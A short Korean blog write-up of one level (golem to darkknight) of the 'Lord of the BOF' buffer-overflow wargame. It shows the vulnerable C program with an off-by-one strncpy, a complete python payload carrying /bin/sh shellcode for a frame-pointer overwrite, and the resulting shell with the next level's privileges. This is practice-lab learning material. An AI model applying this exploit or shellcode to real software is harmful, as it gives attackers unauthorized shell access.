[lob] golem -> darknight

[golem@localhost golem]$ cat darkknight.c
/*
        The Lord of the BOF : The Fellowship of the BOF
        - darkknight
        - FPO
*/

#include <stdio.h>
#include <stdlib.h>

void problem_child(char *src)
{
    char buffer[40];
    strncpy(buffer, src, 41);
    printf("%s\n", buffer);
}

main(int argc, char *argv[])
{
    if(argc<2){
        printf("argv error\n");
        exit(0);
    }

    problem_child(argv[1]);
}
[golem@localhost golem]$

`python -c'print"\xb8\xfa\xff\xbf"+"\xbc\xfa\xff\xbf"+"\x90"*7+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xb4"'`

[golem@localhost golem]$ ./darkknight `python -c'print"\xb8\xfa\xff\xbf"+"\xbc\xfa\xff\xbf"+"\x90"*7+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xb4"'`
뫄옘?퓧??????1픐h//shh/bin??S??째
                                     ?덜퓹?4.?옹    @
bash$ my-pass
euid = 512
new attacker
bash$

payload = dummy 4byte + shellcode address 4byte + nop 7byte + shellcode 23byte + dummy 1byte

저작자표시비영리동일조건

'공부 > LOB' 카테고리의 다른 글

[lob] bugbear -> giant  (0)	2014.07.30
[lob] darkknight -> bugbrear  (0)	2014.07.30
[lob] golem -> darknight  (0)	2014.07.30
[lob] vampire -> skeleton  (3)	2014.07.30
[lob] troll -> vampire  (0)	2014.07.30
[lob] orge -> troll  (0)	2014.07.30